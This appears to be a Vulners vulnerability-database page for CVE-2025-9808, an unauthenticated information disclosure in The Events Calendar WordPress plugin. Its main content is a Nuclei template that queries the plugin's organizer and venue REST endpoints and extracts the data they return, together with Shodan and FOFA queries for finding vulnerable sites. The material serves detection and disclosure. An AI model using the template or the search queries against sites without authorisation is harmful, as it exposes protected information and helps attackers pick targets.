| Reporter | Title | Published | Views | Family All 11 |
|---|---|---|---|---|
| CVE-2025-9808 | 20 Dec 202521:03 | β | circl | |
| WordPress plugin The Events Calendar δΏ‘ζ―ζ³ι²ζΌζ΄ | 16 Sep 202500:00 | β | cnnvd | |
| CVE-2025-9808 | 16 Sep 202505:25 | β | cve | |
| CVE-2025-9808 The Events Calendar <= 6.15.2 - Missing Authorization to Unauthenticated Password-Protected Information Disclosure | 16 Sep 202505:25 | β | cvelist | |
| EUVD-2025-29359 | 3 Oct 202520:07 | β | euvd | |
| CVE-2025-9808 | 16 Sep 202506:16 | β | nvd | |
| WordPress The Events Calendar plugin <= 6.15.2 - Missing Authorization to Unauthenticated Password-Protected Information Disclosure vulnerability | 15 Sep 202522:10 | β | patchstack | |
| PT-2025-37866 | 16 Sep 202500:00 | β | ptsecurity | |
| CVE-2025-9808 | 18 Sep 202505:26 | β | redhatcve | |
| CVE-2025-9808 The Events Calendar <= 6.15.2 - Missing Authorization to Unauthenticated Password-Protected Information Disclosure | 16 Sep 202505:25 | β | vulnrichment |
id: CVE-2025-9808
info:
name: The Events Calendar <= 6.15.2 - Information Disclosure
author: zer0p0int
severity: medium
description: |
The Events Calendar WordPress plugin <= 6.15.2 contains an information disclosure vulnerability caused by REST endpoint exposure, letting unauthenticated attackers extract data about password-protected vendors or venues, exploit requires no authentication.
impact: |
Unauthenticated attackers can access sensitive information about password-protected vendors or venues.
remediation: |
Update to the latest version beyond 6.15.2
reference:
- https://www.wiz.io/vulnerability-database/cve/cve-2025-9808
- https://wpscan.com/plugin/the-events-calendar/
- https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/the-events-calendar
- https://wordpress.org/plugins/the-events-calendar/
- https://nvd.nist.gov/vuln/detail/CVE-2025-9808
metadata:
verified: true
max-request: 2
shodan-query: http.html:"/wp-content/plugins/the-events-calendar/"
fofa-query: body="/wp-content/plugins/the-events-calendar/"
publicwww-query: "/wp-content/plugins/the-events-calendar/"
tags: cve,cve2025,wordpress,wp-plugin,wpscan,the-events-calendar,unauth,vuln
http:
- method: GET
path:
- "{{BaseURL}}/wp-json/tribe/events/v1/organizers"
- "{{BaseURL}}/wp-json/tribe/events/v1/venues"
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains_all(body,"rest_url","total")'
- 'contains_any(body,"organizers","venues")'
- 'contains(header,"application/json")'
condition: and
extractors:
- type: regex
part: body
name: organizer_data
group: 1
regex:
- '"organizers":\[(.*?)\],"rest_url"'
- type: regex
part: body
name: venue_data
group: 1
regex:
- '"venues":\[(.*?)\],"rest_url"'
# digest: 4a0a0047304502201673a52f687efaa722968308d3f40ee35d3ffb5462cc28f1eff5137360aece08022100feab62f99f297b44e62813b3e160ec5047e4b1c7fa213309c7312e3fb14ed903:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation withΒ Vulners data
WeΒ provide theΒ essential building blocks forΒ cybersecurity solutions withΒ comprehensive, structured, andΒ constantly updated vulnerability andΒ exploits data
Api
Power your application withΒ Vulners API
The Vulners REST API offers reliable, high-performance access toΒ vulnerabilityΒ intelligence, withΒ 99.9%Β SLAΒ uptime andΒ CDN-backed data delivery forΒ seamlessΒ global access
App
Assess and manage vulnerabilities withΒ VulnersΒ tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation